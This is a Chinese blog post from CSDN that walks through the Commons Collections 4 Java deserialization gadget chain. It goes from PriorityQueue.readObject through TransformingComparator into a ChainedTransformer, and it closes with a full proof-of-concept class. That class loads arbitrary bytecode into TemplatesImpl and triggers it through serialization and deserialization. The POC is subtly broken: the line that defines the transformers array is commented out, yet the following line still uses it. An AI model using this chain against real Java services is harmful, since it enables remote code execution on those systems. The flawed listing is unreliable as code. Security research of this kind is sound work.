Java安全—CommonsCollections4

最新推荐文章于 2024-04-30 17:28:01 发布
最新推荐文章于 2024-04-30 17:28:01 发布
阅读量1.5k 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2204/article/details/128609579
版权

引子

CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。 接下来让我们仔细分析一下。

PriorityQueue

PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口

PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

我们先看它的readobject()方法

private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {// Read in size, and any hidden stuffs.defaultReadObject();// Read in (and discard) array lengths.readInt();queue = new Object[size];// Read in all elements.for (int i = 0; i < size; i++)queue[i] = s.readObject();// Elements are guaranteed to be in "proper order", but the// spec has never explained what that might be.heapify();
}

重写了该方法并在最后调用了heapify()方法,我们跟进一下:

private void heapify() {for (int i = (size >>> 1) - 1; i >= 0; i--)siftDown(i, (E) queue[i]);
}

这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

这里用到的是该类的add方法,将指定的元素插入此优先级队列。

heapify()调用了siftdown()方法,继续跟进:

private void siftDown(int k, E x) {if (comparator != null)siftDownUsingComparator(k, x);elsesiftDownComparable(k, x);
}

可以看到判断条件

 if (comparator != null)

调用了

siftDownUsingComparator(k, x);

在siftDownUsingComparator()又调用了 comparator.compare()。

TransformingComparator

可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

TransformingComparator是一个修饰器,和CC1中的ChainedTransformer类似。

TransformingComparator里面存在compare方法,当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后,会调用ChainedTransformer#transform反射链。

问题

1.就像刚才heapify里面所说的

private void heapify() {for (int i = (size >>> 1) - 1; i >= 0; i--)siftDown(i, (E) queue[i]);
}

我们要进入循环要修改值,通过add方法。

priorityQueue.add(1);
priorityQueue.add(2);

2.initialCapacity的值要大于1

3.comparator != null

4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

类似这个样子:

Class c=transformingComparator.getClass();Field transformField=c.getDeclaredField("transformer");transformField.setAccessible(true);transformField.set(transformingComparator,chainedTransformer);

我们先放置个反序列化前不会执行这条链的随便一个参数:

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

POC

package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
 
 
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
 
public class cc4 {
 public static void main(String[] args) throws Exception {TemplatesImpl templates=new TemplatesImpl();Class tc=templates.getClass();Field nameField=tc.getDeclaredField("_name");nameField.setAccessible(true);nameField.set(templates,"XINO");Field bytecodesField=tc.getDeclaredField("_bytecodes");bytecodesField.setAccessible(true);byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));byte[][] codes={code};bytecodesField.set(templates,codes);
 Field tfactoryField=tc.getDeclaredField("_tfactory");tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());
 InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
 //Transformer[] transformers=new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};
 ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
 TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
 PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);priorityQueue.add(1);priorityQueue.add(2);
 Class c=transformingComparator.getClass();Field transformField=c.getDeclaredField("transformer");transformField.setAccessible(true);transformField.set(transformingComparator,chainedTransformer);
 
 
 serialize(priorityQueue);unserialize("ser.bin");
 }
 public static void serialize(Object obj) throws Exception{ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));oss.writeObject(obj);}
 public static void unserialize(Object obj) throws Exception{ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));oss.readObject();}
 
}

结语

这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。

万天峰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华为java安全编码规范考试3.1.md
07-27
华为java安全编码规范考试3.1 血与泪整理除的答案,当前时间保证是最新的,基本所有题都能找到。有几题答案没写出来,但是写了所有的错误答案…………排除法
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom; 包含翻译后的API文档:commons-collections4-4.4-javadoc-API文档-中文(简体)-英语-对照版.zip; Maven坐标:org.apache.commons:commons-collections4:4.4; 标签:apache、collections4commons、jar包、java、中英对照文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。 双语对照,边学技术、边学英语。
Java安全中文版
07-05
Java安全》中文版第二版PDF,Java Security,Second Edition 本书系《Java安全》第二版,内容涉及安全管理器、类装载器、存取控制器以及java.security包等。此外还讨论了消息摘要、证书和数字签名,并介绍了如何利用Java所提供的功能建立类签名,以及如何自行实现签名功能。通过介绍,您可以了解到如何编写一个类装载器,使之能够识别签名类,对签名进行验证,并可以结合安全管理器为类授予额外的特权。在本书中还讨论了与加密密钥管理有关的问题,以及如何以此为基础自行实现密钥管理系统。这里还详细介绍了如何应用Java安全套接字扩展包(JSSE)实现SSL加密,以及如何利用Java鉴别与授权服务(JAAS)处理鉴别和权限的有关问题。    本书作为一本基础参考书,主要面向为Internet编写应用软件的开发人员。如果您正在使用Java开发软件,就需要了解如何为您编写的类授予特权,而同时又不允许不可信类得到相应的特权。您还要了解如何保护系统不致遭到入侵和破坏。Java提供了有关的工具,而本书的目的就是告诉您如何使用这些工具。
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom; 包含翻译后的API文档:commons-collections4-4.1-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.apache.commons:commons-collections4:4.1; 标签:apache、commonscollections4、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
【小家javaJava之Apache Commons-Collections4使用精讲(Bag、Map、List、Set全覆盖)
架构师:通透,才能写出好代码!
11-15 6959
前言 虽然JDK提供给我们的集合框架已经足够强大,基本能解决我们平时的绝大所述问题,并且效率还挺高。 本文针对于Apache提供的Collections4组件提供的一些特殊数据结构,通过例子解决一些实际问题的讲解。 ® bag接口 ® 固定大小的map、lru (最近最少使用算法)map和双重(dual)map ® 对象数组和map的迭代器 ® map的multikey ® 大量的工具类,提供了使...
Apache Commons-Collections4工具类使用(Map、List、Set集合全覆盖)集合开发工具大利器
竹林幽深
08-22 1411
开发中我们常常会遇到对集合的操作,使用这个类库能简化你的代码,从而提高你的工作效率,让你从大量的底层代码中抽身。工欲善其事必先利其器,希望我介绍以后大家在开发中多多去使用这些工具类,让它们成为你在开发中的大利器。extends O> b):两个集合的连接,类似于ORACLE数据库union all的功能。CollectionUtils:集合操作的工具类,开发中会常常的使用。xiaozhang ,公众号:程序员xiaozhang。如下是它的包结构,里面有很多好用的工具类。收录于合集#Java27个。
commons-collections4包工具类介绍
liuerchong的博客
09-12 4338
Packageorg.apache.commons.collections4 This package contains the interfaces and utilities shared across all the subpackages of this component. See:Description Interface Summary Interface Description Bag<E> Defines a collectio..
commons-collections4集合类库使用
Jaemon
05-25 8182
commons-collections4集合类库使用
org.apache.commons.collections4下的CollectionUtils工具类
m0_59690068的博客
01-18 793
【代码】apache下的CollectionUtils工具类。
commons-collections4、关于springframework的CollectionUtils包工具类介绍
m0_37910112的博客
04-14 830
【代码】commons-collections4、关于springframework的CollectionUtils包工具类介绍。
(Java毕业设计)基于JAVA安全电子商务().rar
03-20
(Java毕业设计)基于JAVA安全电子商务(Java毕业设计)基于JAVA安全电子商务(Java毕业设计)基于JAVA安全电子商务(Java毕业设计)基于JAVA安全电子商务(Java毕业设计)基于JAVA安全电子商务(Java毕业设计)基于...
Java安全编码标准_PDF电子书下载 带索引书签目录_完整版
04-08
不仅从语言角度系统而详细地阐述java安全编码的要素、标准、规范和最佳实践,而且从架构设计的角度分析了java api存在的设计缺陷和可能存在的安全风险,以及应对的策略和措施。可以将本书作为java安全方面的工具书,...
java源码包4
04-20
Applet钢琴模拟程序java源码 2个目标文件,提供基本的音乐编辑功能。编辑音乐软件的朋友,这款实例会对你有所帮助。 Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来模拟银行...
Commons Collections4&Commons Collections5
ki10Moc的博客
12-15 372
java安全cc4&cc5
Javaweb安全——反序列化漏洞-commons-collections4利用链(CC2和CC4)
weixin_43610673的博客
07-06 2186
在2015年底commons-collections反序列化利用链被提出时,Apache Commons Collections有以下两个分支版本:对旧CC链的影响主要体现在 这个方法被修改了在commons-collections4中对应的方法为。3和4的groupId和artifactId都不一样所以可以在同一项目中共存方便调试。 还是做的一个LazyMap构造函数包装,基本就是改了个名字,那将之前的链子decorate换成lazyMap就行,导入的包名变。以CC6为例: CC1、CC3、CC6修改之后
Commons Collections4 简单使用
热门推荐
public
03-14 2万+
一.org.apache.commons.collections4.Bag&lt;E&gt;:    Bag接口定义了一个集合,它可以计算一个对象出现在集合中的次数。 例如,如果Bag包含{a,a,b,c},则getCount("a")方法将返回2,而uniqueSet()返回唯一值。二.org.apache.commons.collections4.BidiMap &lt;K,V&gt;使用双向...
commons-collections4工具常用方法
qq_63431773的博客
10-05 432
是Apache Commons项目中的一个模块,提供了一系列处理集合和映射的工具类、接口和算法。它是在的基础上进行了改进和增强,为Java开发者提供了更多集合操作的功能和便利性。
[Java反序列化]—CommonsCollections4
Sentiment的博客
06-02 793
之前分析的CC链都是基于CommonsCollections3.2.1及其之前版本的,而后边退出了新的版本,而本篇分析的就是基于CC 4.0版本的(除此外还有CC2)本条链的前半段其实跟CC3一样,都是一个动态加载字节码的过程,而后边构造时,主要用到了两个类和这里ysoseria并没有给出,所以仿照ysoseria总结了一下: PriorityQueue 先看下测试代码: 之所以用它,是因为它重写了自己的方法 最后调用了 接着调用 当comparator不为null时调用 最后调用,而在本类的构造方法中可控
链表刷题集
最新发布
yajunjiao的专栏
04-30 904
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
java安全漫谈pdf
01-29
Java安全漫谈是一本关于Java安全的书籍,深入探讨了Java应用程序在网络环境中的安全性和相关的安全漏洞。该书内容涵盖了Java安全基础、Java虚拟机的安全机制、Java安全管理、Java安全开发等方面的知识。 首先,Java安全基础部分介绍了Java安全模型的原理和特点,包括Java类库的安全特性、权限管理和访问控制、安全策略配置等。这部分内容可帮助开发人员了解Java应用程序的安全需求,并提供相应的解决方案。 其次,Java虚拟机的安全机制是Java应用程序的基石。该书介绍了Java虚拟机的安全沙箱和类加载机制,并讨论了如何利用这些安全机制避免恶意代码的执行和隐患的防范。 此外,Java安全管理部分从用户角度出发,介绍了Java应用程序的安全管理工具和技术,如Java安全策略文件、权限管理和安全认证等。开发人员可以通过合理配置和使用这些工具来提高Java应用程序的安全性。 最后,该书还涉及了Java安全开发过程中的一些最佳实践和常见安全漏洞,如输入验证、跨站脚本攻击(XSS)、SQL注入、跨站请求伪造(CSRF)等。通过学习和掌握这些知识,开发人员可以编写出更加安全Java应用程序。 总而言之,Java安全漫谈是一本全面讨论Java安全的书籍,内容涵盖了Java安全基础、Java虚拟机的安全机制、Java安全管理和Java安全开发等方面的知识。它对于开发人员和安全从业人员来说,都是一本重要的参考书,有助于提高Java应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值